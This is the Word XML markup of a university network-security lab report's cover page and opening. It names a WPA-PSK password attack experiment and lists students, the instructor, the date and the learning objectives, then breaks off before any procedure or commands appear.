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31810" w14:textId="77777777" w:rsidR="00507652" w:rsidRPr="00613553" w:rsidRDefault="00507652" w:rsidP="00507652">
      <w:pPr>
        <w:spacing w:afterLines="50" w:after="156"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷"/>
          <w:bCs/>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00613553">
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>电子科技大学</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>信息与软件工程</w:t>
      </w:r>
      <w:r w:rsidRPr="00613553">
        <w:rPr>
          <w:rFonts w:ascii="华文行楷" w:eastAsia="华文行楷" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>学院</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8F1A46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7FEF97AA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259A435B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2A16B16F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72"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="楷体_GB2312" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="72"/>
        </w:rPr>
        <w:t>实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验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报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告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A1ABB7" w14:textId="77777777" w:rsidR="00507652" w:rsidRDefault="00507652" w:rsidP="00507652">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="方正舒体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C4574C2" w14:textId="77777777" w:rsidR="00507652" w:rsidRDefault="00507652" w:rsidP="00507652">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="方正舒体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F9CF1D1" w14:textId="77777777" w:rsidR="00507652" w:rsidRDefault="00507652" w:rsidP="00507652">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="方正舒体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44A18902" w14:textId="5B6C1395" w:rsidR="00397A71" w:rsidRDefault="00397A71" w:rsidP="006449F1">
      <w:pPr>
        <w:ind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学</w:t>
      </w:r>
      <w:r w:rsidR="00875687">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>号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</w:t>
      </w:r>
      <w:r w:rsidR="002D0F7F">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00417E6B" w:rsidRPr="00417E6B">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>01</w:t>
      </w:r>
      <w:r w:rsidR="006B737C">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>7221303023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          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA9ACED" w14:textId="6DF6A65C" w:rsidR="00FE434C" w:rsidRDefault="00397A71" w:rsidP="00FE434C">
      <w:pPr>
        <w:ind w:leftChars="800" w:left="168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姓</w:t>
      </w:r>
      <w:r w:rsidR="00875687">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>名</w:t>
      </w:r>
      <w:r w:rsidR="002D0F7F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6B737C">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>陈奎</w:t>
      </w:r>
      <w:r w:rsidR="00BA151A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6B737C">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00BA151A">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">          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     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6033F4C6" w14:textId="2C1FBF85" w:rsidR="00310D83" w:rsidRDefault="00FE434C" w:rsidP="00FE434C">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F78CC">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>（实验）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00507652" w:rsidRPr="009F78CC">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>课程名称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网络安全协议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 w:rsidR="00166BDA">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">      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1C6D47F6" w14:textId="59032EFA" w:rsidR="00310D83" w:rsidRDefault="00310D83" w:rsidP="00CD27CC">
      <w:pPr>
        <w:ind w:leftChars="600"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理论</w:t>
      </w:r>
      <w:r w:rsidR="0089520C">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>教师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罗绪成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 w:rsidR="0089520C">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">            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304F3AB0" w14:textId="6A2E089B" w:rsidR="0089520C" w:rsidRDefault="0089520C" w:rsidP="00CD27CC">
      <w:pPr>
        <w:ind w:leftChars="600"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实验教师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罗绪成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>
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">            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12248179" w14:textId="771EA3A9" w:rsidR="00507652" w:rsidRPr="002D0F7F" w:rsidRDefault="002D0F7F" w:rsidP="002D0F7F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="方正舒体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
        </w:rPr>
      </w:pP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 w:rsidR="00C51568">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>合作队友</w:t>
      </w:r>
      <w:r w:rsidR="00C51568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C51568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C51568">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>郑烁</w:t>
      </w:r>
      <w:r w:rsidR="00C51568" w:rsidRPr="008F3625">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>（201722130</w:t>
      </w:r>
      <w:r w:rsidR="00C51568">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>4002</w:t>
      </w:r>
      <w:r w:rsidR="00C51568" w:rsidRPr="008F3625">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00C51568">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00C51568">
        <w:rPr>
          <w:rFonts w:ascii="黑体" w:eastAsia="黑体"/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D87C3D2" w14:textId="30A2EF11" w:rsidR="00507652" w:rsidRDefault="00507652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75BA247B" w14:textId="01168390" w:rsidR="002D0F7F" w:rsidRDefault="002D0F7F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57C1EEF9" w14:textId="77777777" w:rsidR="002D0F7F" w:rsidRDefault="002D0F7F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7C6FFFFD" w14:textId="77777777" w:rsidR="00507652" w:rsidRPr="00A50DBF" w:rsidRDefault="00507652" w:rsidP="00507652">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="方正舒体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A50DBF">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>电子科技大学教务处制表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBC8FA8" w14:textId="77777777" w:rsidR="005A1724" w:rsidRDefault="005A1724" w:rsidP="005A1724">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="仿宋_GB2312"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FE01EE3" w14:textId="42E5B512" w:rsidR="00507652" w:rsidRDefault="00507652" w:rsidP="005A1724">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="仿宋_GB2312"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="440DB1DF" w14:textId="77777777" w:rsidR="00507652" w:rsidRPr="00507652" w:rsidRDefault="00507652" w:rsidP="002D0F7F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="仿宋_GB2312"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C6D95D2" w14:textId="77777777" w:rsidR="005A1724" w:rsidRPr="00F15578" w:rsidRDefault="005A1724" w:rsidP="005A1724">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>电 子 科 技 大 学</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73198303" w14:textId="77777777" w:rsidR="005A1724" w:rsidRPr="00F15578" w:rsidRDefault="005A1724" w:rsidP="005A1724">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>实   验   报   告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBDFFC1" w14:textId="05519382" w:rsidR="005A1724" w:rsidRPr="00F15578" w:rsidRDefault="005A1724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  <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>学生姓名：</w:t>
      </w:r>
      <w:r w:rsidR="006B737C">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>陈奎</w:t>
      </w:r>
      <w:r w:rsidR="00C51568">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00C51568" w:rsidRPr="008F3625">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>郑烁</w:t>
      </w:r>
      <w:r w:rsidR="009E263F">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00DC39A7">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>学号：</w:t>
      </w:r>
      <w:r w:rsidR="009E263F">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>201</w:t>
      </w:r>
      <w:r w:rsidR="006B737C">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>7221303023</w:t>
      </w:r>
      <w:r w:rsidR="00C51568">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00C51568" w:rsidRPr="008F3625">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2017721304002</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00166BDA">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>指导教师：</w:t>
      </w:r>
      <w:r w:rsidR="00166BDA">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>罗绪成</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00524C9E">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>实验地点：</w:t>
      </w:r>
      <w:r w:rsidR="00166BDA">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>信软楼</w:t>
      </w:r>
      <w:r w:rsidR="009E263F">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00524C9E">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>实验时间：</w:t>
      </w:r>
      <w:r w:rsidR="006B737C">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>19.10.22</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE46DAB" w14:textId="445DDCF9" w:rsidR="00BA151A" w:rsidRDefault="00D21F46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一</w:t>
      </w:r>
      <w:r w:rsidR="00EA7AFF">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="007C285C">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>实验</w:t>
      </w:r>
      <w:r w:rsidR="00EA7AFF">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>名称</w:t>
      </w:r>
      <w:r w:rsidR="005A1724" w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00DC39A7" w:rsidRPr="00DC39A7">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>WPA-PSK 口令攻击实验</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BCCC1A6" w14:textId="4AA8403D" w:rsidR="005A1724" w:rsidRDefault="00D21F46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二</w:t>
      </w:r>
      <w:r w:rsidR="005A1724" w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>、实验学时</w:t>
      </w:r>
      <w:r w:rsidR="00A01D93" w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00113D6B">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="009E263F" w:rsidRPr="00BA151A">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>学时</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FC9479" w14:textId="3D820DB6" w:rsidR="002A08AF" w:rsidRDefault="002A08AF" w:rsidP="002A08AF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三</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>、实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>目的</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE64CF9" w14:textId="77777777" w:rsidR="00DC39A7" w:rsidRDefault="00DC39A7" w:rsidP="00DC39A7">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1019"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:ind w:firstLineChars="0" w:hanging="421"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>掌握</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>WLAN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的工作原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D23C133" w14:textId="77777777" w:rsidR="00DC39A7" w:rsidRDefault="00DC39A7" w:rsidP="00DC39A7">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1019"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="161"/>
        <w:ind w:firstLineChars="0" w:hanging="421"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>理解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>RSN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的密钥层次</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB7AC13" w14:textId="77777777" w:rsidR="00DC39A7" w:rsidRDefault="00DC39A7" w:rsidP="00DC39A7">
      <w:pPr>
        <w:pStyle w:val="ac"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1019"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="160"/>
        <w:ind w:firstLineChars="0" w:hanging="421"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>理解</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-20"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
